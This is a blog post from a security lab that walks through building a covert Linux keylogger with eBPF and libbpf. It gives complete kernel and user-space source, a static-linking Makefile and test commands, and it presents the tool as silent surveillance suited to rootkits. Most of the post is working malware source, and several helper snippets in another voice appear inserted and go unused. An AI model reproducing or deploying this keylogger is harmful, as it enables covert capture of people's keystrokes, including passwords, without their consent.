Feb 5, 2026 by Zacharia Mansouri
https://cylab.be/blog/482/offensive-ebpf-building-a-keylogger-with-libbpf
Sophisticated surveillance tools do not always need to break the system. Often, they simply use it exactly as intended. Imagine a single, lightweight binary capable of running on many Linux servers across different kernel versions. It silently captures every keystroke without requiring a compiler on the target or loading visible kernel modules. In a previous blog post, we explored this concept using a simple bpftrace script. In this one, we port that logic to libbpf. This lets us drop the runtime dependencies and build a standalone C application that uses a BPF ring buffer for efficient event processing.
In a previous blog post, we used bpftrace to rapidly prototype a keylogger. While bpftrace is excellent for one-liners and quick investigations, it relies on the LLVM backend to compile scripts at runtime, which adds startup latency and requires heavy dependencies on the target machine. For building robust, production-grade security tools (or rootkits), we need to move to libbpf, the modern standard for eBPF development. It allows us to write Compile Once - Run Everywhere (CO-RE) applications: lightweight, pre-compiled binaries that start quickly. In this post, we will port our keylogger logic from a script to a full-fledged C application using libbpf and a ring buffer for high-performance data exfiltration.
The older way of writing BPF tools (using the BCC framework) compiled the C code on the fly at startup, typically driven from Python, so the target machine needed kernel headers and a compiler installed. libbpf solves this with CO-RE, which builds on vmlinux.h, a single header that contains every type definition used by the kernel.
The kernel-side file (program.bpf.c) runs inside the kernel. Its only job is to hook the input_event function, filter for key presses, and push the data into a Ring Buffer.
First, we define our environment. Notice we don’t include <linux/sched.h> or other kernel type headers. Instead, we include "vmlinux.h". This single file is generated by bpftool and contains definitions for every struct, union, and typedef in the running kernel. Because it carries types but no #define constants, we still pull in <linux/input-event-codes.h>, a macro-only header, for EV_KEY.
We also define the structure of the data we want to export: the timestamp (ts) and the key code (code).
#include "vmlinux.h" // kernel types: __u64, struct pt_regs, BPF_MAP_TYPE_RINGBUF, ...
#define __TARGET_ARCH_x86 // selects the x86 register layout for PT_REGS_PARMx
#include <bpf/bpf_helpers.h> // SEC(), __uint() and the BPF helper declarations
#include <bpf/bpf_tracing.h> // for PT_REGS_PARMx
#include <linux/input-event-codes.h> // macro-only header, safe next to vmlinux.h (EV_KEY)
struct key_event_t {
__u64 ts;
__u32 code;
};
char LICENSE[] SEC("license") = "GPL";
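Because the same struct is declared once on the kernel side and once in user space, both copies must agree on size and field offsets. The following is a minimal sketch of how that agreement could be checked at compile time. It assumes an x86-64 build, and `struct key_event` and `key_event_tail_padding` are hypothetical names that stand in for the article's key_event_t using fixed-width types.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for key_event_t, using fixed-width types. */
struct key_event {
    uint64_t ts;   /* timestamp in nanoseconds */
    uint32_t code; /* key code */
    /* the compiler adds 4 bytes of tail padding here on x86-64 */
};

/* Compile-time checks of the layout both sides rely on (x86-64 assumed). */
_Static_assert(sizeof(struct key_event) == 16, "unexpected struct size");
_Static_assert(offsetof(struct key_event, code) == 8, "unexpected field offset");

/* Returns the number of padding bytes at the end of the struct. */
static size_t key_event_tail_padding(void)
{
    return sizeof(struct key_event)
         - (offsetof(struct key_event, code) + sizeof(uint32_t));
}
```

Placing the struct in a small header shared by both source files would be another way to keep the two definitions from drifting apart.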
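We define a map called events of type BPF_MAP_TYPE_RINGBUF (available since Linux 5.8). It acts as a circular queue: the kernel program appends records at one end, and our user-space app consumes them from the other. We allocate a generous 16 MiB buffer (1 << 24) so that losing a keystroke is very unlikely, even under heavy load. If the buffer does fill up, bpf_ringbuf_reserve() returns NULL and that event is dropped.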
struct {
__uint(type, BPF_MAP_TYPE_RINGBUF);
__uint(max_entries, 1 << 24); // 16MB
} events SEC(".maps");
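To get a feel for how much headroom 16 MiB gives, the arithmetic can be sketched in plain C. This is an estimate under stated assumptions: each record carries an 8-byte header and its payload is rounded up to a multiple of 8 bytes, which is my reading of the kernel's ring buffer implementation. The helper names are hypothetical.

```c
#include <stddef.h>

#define RINGBUF_HDR_SZ 8u /* assumed per-record header size */

/* Bytes one record occupies: header plus payload rounded up to 8 bytes. */
static size_t record_footprint(size_t payload)
{
    return RINGBUF_HDR_SZ + ((payload + 7u) & ~(size_t)7u);
}

/* Upper bound on the number of unread records that fit in the buffer. */
static size_t ringbuf_capacity(size_t buf_bytes, size_t payload)
{
    return buf_bytes / record_footprint(payload);
}
```

With a 16-byte event, `ringbuf_capacity((size_t)1 << 24, 16)` comes out at roughly 700,000 unread key presses, so a much smaller buffer would likely be enough for a keyboard.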
We attach our function to kprobe/input_event. Just like in our previous blog post, when using a bpftrace script, we’ll need to access the arguments. However, in compiled C, we use architecture-specific macros (PT_REGS_PARM2, etc.) to read the CPU registers where the arguments are stored:
arg1 (input_dev): The pointer to the input device (we won’t use it here).
arg2 (type): The event type, used to check whether it is a keyboard event (EV_KEY).
arg3 (code): The actual key being pressed.
arg4 (value): The state (0 = released, 1 = pressed, 2 = auto-repeat).
SEC("kprobe/input_event")
int trace_input_event(struct pt_regs *ctx)
{
    __u32 type = PT_REGS_PARM2(ctx);
    __u32 code = PT_REGS_PARM3(ctx);
    __s32 value = PT_REGS_PARM4(ctx);
    // Filter: We only want key presses (value == 1) of type EV_KEY
    if (type == EV_KEY && value == 1) {
        struct key_event_t *data;
        // Reserve space in the Ring Buffer
        data = bpf_ringbuf_reserve(&events, sizeof(*data), 0);
        if (!data)
            return 0;
        // Populate the data
        data->ts = bpf_ktime_get_ns();
        data->code = code;
        // Commit (Submit) the data to user space
        bpf_ringbuf_submit(data, 0);
    }
    return 0;
}
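The register-to-argument mapping behind PT_REGS_PARMx can be illustrated outside the kernel. On x86-64, the System V calling convention passes the first four integer arguments in rdi, rsi, rdx and rcx. The sketch below mimics the probe's filter on a mock register set. `struct mock_regs`, `EV_KEY_TYPE` and `is_key_press` are hypothetical names for illustration, not part of libbpf or the kernel.

```c
#include <stdint.h>

#define EV_KEY_TYPE 0x01 /* same value as EV_KEY in input-event-codes.h */

/* Hypothetical stand-in for the argument registers found in struct pt_regs. */
struct mock_regs {
    unsigned long di; /* 1st argument: struct input_dev *dev */
    unsigned long si; /* 2nd argument: unsigned int type */
    unsigned long dx; /* 3rd argument: unsigned int code */
    unsigned long cx; /* 4th argument: int value */
};

/* Returns 1 and stores the key code if the call is a key press, else 0. */
static int is_key_press(const struct mock_regs *regs, uint32_t *code_out)
{
    uint32_t type = (uint32_t)regs->si;
    uint32_t code = (uint32_t)regs->dx;
    int32_t value = (int32_t)regs->cx;

    if (type != EV_KEY_TYPE || value != 1)
        return 0;
    *code_out = code;
    return 1;
}
```

Key releases (value 0) and auto-repeat events (value 2) fall through the filter, which matches the behaviour of the probe above.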
The user-space component (program.c) loads the BPF program and consumes the events from the ring buffer. Among the included headers, program.skel.h is an auto-generated header that defines a C struct representing our BPF program. It handles all the low-level work of creating maps, loading bytecode, and attaching probes. This reduces hundreds of lines of boilerplate to just open, load, and attach.
The handle_event callback is invoked by libbpf, from inside ring_buffer__poll(), once for each record available in the ring buffer. It simply casts the raw memory to our key_event_t struct and prints it.
#include <stdio.h>
#include <bpf/libbpf.h>
#include <bpf/bpf.h> // to avoid implicit declaration of functions such as bpf_map_update_elem()
#include "program.skel.h"
struct key_event_t {
    __u64 ts;
    __u32 code;
};
static int handle_event(void *ctx, void *data, size_t len) {
    const struct key_event_t *event = data;
    if (len < sizeof(*event)) // ignore truncated records
        return 0;
    printf("Key code: %u at time %llu\n", event->code, (unsigned long long)event->ts);
    return 0;
}
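The callback trusts that every record is a complete key_event_t. A slightly more defensive variant, sketched here in plain C, validates the length and copies the bytes before use. `struct key_event` and `parse_key_event` are hypothetical names, and the struct is a fixed-width stand-in for the article's key_event_t.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-in for key_event_t. */
struct key_event {
    uint64_t ts;
    uint32_t code;
};

/* Copies a record into *out; returns 0 on success, -1 if the record is too short. */
static int parse_key_event(const void *data, size_t len, struct key_event *out)
{
    if (data == NULL || len < sizeof(*out))
        return -1;
    memcpy(out, data, sizeof(*out)); /* avoids alignment assumptions */
    return 0;
}
```

A callback could call this helper first and skip any record for which it returns -1.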
Inside the main function, we perform the lifecycle management. program_bpf__open_and_load() is a convenience function that handles verifying the BPF bytecode with the kernel. program_bpf__attach() activates the kprobes.
int main(void) {
    struct program_bpf *skel = program_bpf__open_and_load();
    if (!skel) {
        fprintf(stderr, "Failed to load skeleton\n");
        return 1;
    }
    if (program_bpf__attach(skel)) {
        fprintf(stderr, "Failed to attach BPF program\n");
        program_bpf__destroy(skel); // release maps and programs before exiting
        return 1;
    }
Finally, we set up the ring buffer manager. We link it to the file descriptor of our events map and pass our handle_event callback. The while loop essentially puts the program to sleep until the kernel wakes it up with new data.
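    struct ring_buffer *rb = ring_buffer__new(bpf_map__fd(skel->maps.events), handle_event, NULL, NULL);
    if (!rb) {
        fprintf(stderr, "Failed to create ring buffer\n");
        program_bpf__destroy(skel);
        return 1;
    }
    while (1) {
        int err = ring_buffer__poll(rb, -1); // blocks until event arrives
        if (err < 0) // e.g. -EINTR when a handled signal interrupts the wait
            break;
    }
    ring_buffer__free(rb);
    program_bpf__destroy(skel);
    return 0;
}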
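With an unconditional while (1), the cleanup calls after the loop are only reached if the loop has some way to end. One common pattern, sketched here under assumptions, is a stop flag set from a signal handler. `poll_fn` and `fake_poll` are hypothetical stand-ins for ring_buffer__poll() so that the example stays runnable without libbpf.

```c
#include <signal.h>

static volatile sig_atomic_t stop_requested;

static void on_signal(int signo)
{
    (void)signo;
    stop_requested = 1;
}

/* Hypothetical stand-in for ring_buffer__poll(rb, timeout_ms). */
typedef int (*poll_fn)(void *ctx, int timeout_ms);

/* Polls until a signal arrives or the poll fails; returns the iteration count. */
static int run_until_stopped(poll_fn poll_once, void *ctx)
{
    int iterations = 0;

    signal(SIGINT, on_signal);
    signal(SIGTERM, on_signal);
    while (!stop_requested) {
        iterations++;
        if (poll_once(ctx, 100) < 0)
            break;
    }
    return iterations;
}

/* Demo stub: pretends to poll and raises SIGINT on the third call. */
static int fake_poll(void *ctx, int timeout_ms)
{
    int *calls = ctx;

    (void)timeout_ms;
    if (++*calls == 3)
        raise(SIGINT);
    return 0;
}
```

In the real program the loop body would call ring_buffer__poll() with a finite timeout, so the flag is re-checked regularly and ring_buffer__free() and program_bpf__destroy() run on Ctrl-C.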
If you are developing this on a headless server or a VM, you might not have a physical keyboard attached. In order to verify that the tool works, we can simulate hardware input events using a program called input-emulator.
sudo apt install meson # If not installed already (other dependencies might be missing)
git clone https://github.com/tio/input-emulator
cd input-emulator
meson setup build
meson compile -C build
sudo meson install -C build
Launch the compiled binary in your first terminal:
sudo ./program
In a second terminal, spin up the virtual keyboard and type the letter 'a':
sudo input-emulator start kbd # Start virtual keyboard
sudo input-emulator kbd key a # Press a virtual key
The agent will output:
Key code: 30 at time 17356892
...
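The raw output is easier to read once key codes are mapped to names and the nanosecond timestamp is shortened. The sketch below covers only a handful of codes, with values taken from linux/input-event-codes.h. `keycode_name` and `format_timestamp` are hypothetical helper names, not part of the original tool.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Small excerpt of the key codes defined in linux/input-event-codes.h. */
static const char *keycode_name(uint32_t code)
{
    switch (code) {
    case 1:  return "ESC";
    case 28: return "ENTER";
    case 30: return "A";
    case 31: return "S";
    case 32: return "D";
    case 57: return "SPACE";
    default: return "UNKNOWN";
    }
}

/* Formats a nanosecond timestamp as seconds with millisecond precision. */
static int format_timestamp(uint64_t ns, char *buf, size_t size)
{
    return snprintf(buf, size, "%llu.%03llu",
                    (unsigned long long)(ns / 1000000000ULL),
                    (unsigned long long)((ns % 1000000000ULL) / 1000000ULL));
}
```

For the sample line above, code 30 maps to "A". Note that key codes identify physical keys, so turning them into characters would also require tracking modifier keys and the keyboard layout.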
To keep the project structure clean and standardized, this code follows the pattern outlined in the eBPF CO-RE guide. This ensures we are using modern CO-RE best practices, separating the kernel logic, the user-space controller, and the build system into distinct, manageable components.
Below is the complete source code for the project.
Kernel-side code (program.bpf.c)
#include "vmlinux.h" // CO-RE types: __u64, struct pt_regs, BPF_MAP_TYPE_RINGBUF, ...
#define __TARGET_ARCH_x86
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>
#include <linux/input-event-codes.h> // Macro-only header, such as EV_KEY
struct key_event_t {
    __u64 ts;
    __u32 code;
};
// Ring buffer for user-space events (16MB)
struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    __uint(max_entries, 1 << 24);
} events SEC(".maps");
// Hook: void input_event(struct input_dev *dev, unsigned int type, unsigned int code, int value)
SEC("kprobe/input_event")
int trace_input_event(struct pt_regs *ctx)
{
    __u32 type = PT_REGS_PARM2(ctx); // arg2: type
    __u32 code = PT_REGS_PARM3(ctx); // arg3: key code
    __s32 value = PT_REGS_PARM4(ctx); // arg4: state (0=up, 1=down)
    // Filter: We only want key presses (value == 1) of type EV_KEY
    if (type == EV_KEY && value == 1) {
        struct key_event_t *data;
        // Reserve space in the Ring Buffer
        data = bpf_ringbuf_reserve(&events, sizeof(*data), 0);
        if (!data)
            return 0;
        // Populate the data
        data->ts = bpf_ktime_get_ns();
        data->code = code;
        // Commit (Submit) the data to user space
        bpf_ringbuf_submit(data, 0);
    }
    return 0;
}
char LICENSE[] SEC("license") = "GPL";
User-space code (program.c)
#include <stdio.h>
#include <bpf/libbpf.h>
#include <bpf/bpf.h>
#include "program.skel.h" // Auto-generated header via bpftool
// Matches memory layout of struct in kernel code
struct key_event_t {
    __u64 ts;
    __u32 code;
};
// Callback triggered when data arrives from the kernel
static int handle_event(void *ctx, void *data, size_t len) {
    const struct key_event_t *event = data; // Cast raw bytes to event struct
    if (len < sizeof(*event)) // Ignore truncated records
        return 0;
    printf("Key code: %u at time %llu\n", event->code, (unsigned long long)event->ts);
    return 0;
}
int main(void) {
    // Load bytecode and verify maps
    struct program_bpf *skel = program_bpf__open_and_load();
    if (!skel) {
        fprintf(stderr, "Failed to load skeleton\n");
        return 1;
    }
    // Attach bpf program to kernel hooks
    if (program_bpf__attach(skel)) {
        fprintf(stderr, "Failed to attach BPF program\n");
        program_bpf__destroy(skel);
        return 1;
    }
    // Configure the ring buffer consumer with a callback
    struct ring_buffer *rb = ring_buffer__new(bpf_map__fd(skel->maps.events), handle_event, NULL, NULL);
    if (!rb) {
        fprintf(stderr, "Failed to create ring buffer\n");
        program_bpf__destroy(skel);
        return 1;
    }
    while (1) {
        // Block until an event occurs; stop on errors such as -EINTR
        if (ring_buffer__poll(rb, -1) < 0)
            break;
    }
    // Free the resources
    ring_buffer__free(rb);
    program_bpf__destroy(skel);
    return 0;
}
To build this, simply run make. The Makefile handles generating vmlinux.h, compiling the BPF code to bytecode, generating the skeleton header, and linking the final binary. It expects a local libbpf build under ./libbpf/build (see LIBBPF_DIR) and bpftool on the PATH.
# Compiler settings
BPF_CLANG=clang
# Kernel side flags
BPF_CFLAGS=-g -O2 -target bpf
# Userspace side flags
# FIX: Added -std=gnu99 to prevent C23 symbol issues (like __isoc23_strtoull)
USER_CFLAGS=-g -O2 -std=gnu99
# --- LIBBPF CONFIG ---
# Point to the library we built locally
LIBBPF_DIR = ./libbpf/build
LIBBPF_OBJ = $(LIBBPF_DIR)/libbpf.a
# Include the headers we installed into libbpf/build/usr/include
# We also include uapi for kernel definitions if needed
INCLUDES = -I$(LIBBPF_DIR)/usr/include -I./libbpf/include/uapi
# Link Statically: Bundles libbpf into the binary
STATIC_LDFLAGS = -static -Wl,--whole-archive $(LIBBPF_OBJ) -Wl,--no-whole-archive -lelf -lz
# Project Name
NAME=program
BPFOBJ=$(NAME).bpf.o
SKELETON=$(NAME).skel.h
EXEC=$(NAME)
# --- TARGETS ---
# Build User-Space Executable
$(EXEC): $(SKELETON) $(NAME).c
	$(BPF_CLANG) $(USER_CFLAGS) $(INCLUDES) $(NAME).c $(STATIC_LDFLAGS) -o $(EXEC)
# Build BPF Kernel Object
$(BPFOBJ): $(NAME).bpf.c vmlinux.h
	$(BPF_CLANG) $(BPF_CFLAGS) $(INCLUDES) -c $(NAME).bpf.c -o $(BPFOBJ)
# Generate vmlinux.h (The "All-in-One" Kernel Header)
vmlinux.h:
	bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h
# Generate Skeleton Header (Bridge between Kernel and User)
$(SKELETON): $(BPFOBJ)
	bpftool gen skeleton $(BPFOBJ) > $(SKELETON)
clean:
	-rm -f *.o *.skel.h vmlinux.h $(EXEC)
Moving from a script-based workflow to a compiled one is a real step up. With libbpf and a ring buffer, we get a tool that avoids bpftrace’s runtime compilation and startup cost, stays within the verifier’s safety rails, and can run on other machines with compatible kernels without dragging along heavy dependencies.
This blog post is licensed under CC BY-SA 4.0